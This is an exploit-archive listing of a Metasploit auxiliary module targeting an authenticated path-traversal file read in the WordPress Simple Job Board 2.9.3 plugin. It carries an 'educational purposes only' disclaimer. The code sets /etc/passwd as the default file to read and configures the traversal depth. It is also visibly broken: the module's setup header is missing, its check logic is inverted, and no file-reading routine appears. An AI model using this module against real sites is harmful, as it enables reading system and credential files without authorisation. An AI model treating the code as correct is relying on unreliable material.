Exploits / Vulnerability Discovered : 2021-01-21 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress plugin simple job board 2.9.3 authenticated file read (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
register_options([
OptString.new('FILEPATH',[true,'The path to the file to read','/etc/passwd']),
OptString.new('USERNAME',[true,'The WordPress username to authenticate with']),
OptString.new('PASSWORD',[true,'The Wordpress password to authenticate with']),
OptInt.new('DEPTH',[true,'Traversal Depth (to reach the root folder',8]),
])
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def check
cookie = wordpress_login(username,password)
if cookie.nil?
store_valid_credential(user: username, private: password, proof: cookie)
return CheckCode::Safe
end
CheckCode::Appears
end